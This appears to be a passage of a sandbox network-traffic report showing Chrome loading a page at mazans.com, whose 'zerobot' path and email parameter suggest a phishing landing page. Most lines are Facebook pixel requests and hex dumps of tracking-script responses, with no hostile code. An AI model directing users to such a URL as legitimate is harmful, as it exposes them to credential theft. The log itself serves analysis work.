                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC677OUTGET /tr/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                          X-FB-Connection-Quality: GOOD; q=0.7, rtt=119, rtx=0, c=10, mss=1380, tbw=3402, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          112192.168.2.1749946157.240.253.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC925OUTGET /tr/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                          X-FB-Connection-Quality: GOOD; q=0.7, rtt=118, rtx=0, c=10, mss=1380, tbw=3403, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          113192.168.2.1749945157.240.253.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1035OUTGET /privacy_sandbox/pixel/register/trigger/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Attribution-Reporting-Eligible: event-source, trigger=navigation-source
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7436801841278341109", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7436801841278341109"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1777INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC4INData Raw: 34 33 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 43
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC74INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 04 00 00 00 b5 1c 0c 02 00 00 00 0a 49 44 41 54 78 9c 63 00 01 00 00 05 00 01 0d 0a 2d b4 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDRIDATxc-IENDB`0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          114192.168.2.1749944157.240.253.14436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1388OUTGET /signals/config/1040773425961662?v=2.9.176&r=stable&domain=mazans.com&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C15 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-900rACAB' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1491INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC14893INData Raw: 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: urn!1}return!0}())return;var g=typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbo
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1491INData Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 61 2c 62 29 3a 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 29 7d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 7b 7d 2c 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 3d 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .setPrototypeOf(a,b):a.__proto__=b)}f.__fbeventsModules||(f.__fbeventsModules={},f.__fbeventsResolvedModules={},f.getFbeventsModules=function(a){f.__fbeventsResolvedModules[a]||(f.__fbeventsResolvedModules[a]=f.__fbeventsModules[a]());return f.__fbeventsR
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1500INData Raw: 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: entsModules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.p
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC13393INData Raw: 74 72 61 63 74 50 61 67 65 46 65 61 74 75 72 65 73 2c 41 3d 6d 2e 73 69 67 6e 61 6c 73 47 65 74 54 72 75 6e 63 61 74 65 64 42 75 74 74 6f 6e 54 65 78 74 2c 42 3d 6d 2e 73 69 67 6e 61 6c 73 47 65 74 57 72 61 70 70 69 6e 67 42 75 74 74 6f 6e 3b 6d 2e 67 65 74 4a 73 6f 6e 4c 44 46 6f 72 45 78 74 72 61 63 74 6f 72 73 3b 76 61 72 20 43 3d 75 2e 67 65 6e 43 75 73 74 6f 6d 44 61 74 61 2c 44 3d 75 2e 72 65 64 75 63 65 43 75 73 74 6f 6d 44 61 74 61 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 65 77 20 64 28 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 61 3d 73 2e 74 72 69 67 67 65 72 28 7b 74 61 72 67 65 74 3a 61 2c 70 69 78 65 6c 3a 62 7d 29 5b 30 5d 3b 62 3d 5b 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 61 3d 6f 28 61 2c 66 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: tractPageFeatures,A=m.signalsGetTruncatedButtonText,B=m.signalsGetWrappingButton;m.getJsonLDForExtractors;var C=u.genCustomData,D=u.reduceCustomData;e.exports=new d(function(d,e){function m(a,b){a=s.trigger({target:a,pixel:b})[0];b=[];if(a!=null){a=o(a,fu
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1500INData Raw: 66 62 63 6c 69 64 22 2c 22 65 62 70 5f 70 61 74 68 22 3a 22 63 6c 69 63 6b 49 44 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 61 65 6d 22 2c 22 71 75 65 72 79 22 3a 22 61 65 6d 22 2c 22 65 62 70 5f 70 61 74 68 22 3a 22 61 65 6d 22 7d 5d 7d 2c 22 65 6e 61 62 6c 65 46 62 63 50 61 72 61 6d 53 70 6c 69 74 22 3a 66 61 6c 73 65 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 62 72 6f 77 73 65 72 70 72 6f 70 65 72 74 69 65 73 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70 74 49 6e 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 42 72 6f 77 73 65 72 50 72 6f 70 65 72 74 69 65 73 22 2c 20 74 72 75 65 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: fbclid","ebp_path":"clickID"},{"prefix":"aem","query":"aem","ebp_path":"aem"}]},"enableFbcParamSplit":false});fbq.loadPlugin("browserproperties");instance.optIn("1040773425961662", "BrowserProperties", true);fbq.loadPlugin("estruleengine");instance.op
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC405INData Raw: 31 32 33 38 37 2c 22 74 74 6c 49 6e 48 6f 75 72 22 3a 31 2c 22 72 74 63 50 6f 72 74 4e 75 6d 62 65 72 73 22 3a 5b 31 32 35 38 30 2c 31 32 35 38 31 2c 31 32 35 38 32 2c 31 32 35 38 33 2c 31 32 35 38 34 2c 31 32 35 38 35 5d 2c 22 65 6e 61 62 6c 65 57 65 62 52 54 43 22 3a 66 61 6c 73 65 7d 29 3b 0a 66 62 71 2e 6c 6f 61 64 50 6c 75 67 69 6e 28 22 61 63 74 69 6f 6e 69 64 22 29 3b 0a 69 6e 73 74 61 6e 63 65 2e 6f 70 74 49 6e 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 41 63 74 69 6f 6e 49 44 22 2c 20 74 72 75 65 29 3b 0a 63 6f 6e 66 69 67 2e 73 65 74 28 22 31 30 34 30 37 37 33 34 32 35 39 36 31 36 36 32 22 2c 20 22 67 61 74 69 6e 67 22 2c 20 7b 22 67 61 74 69 6e 67 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 74 79 70 65
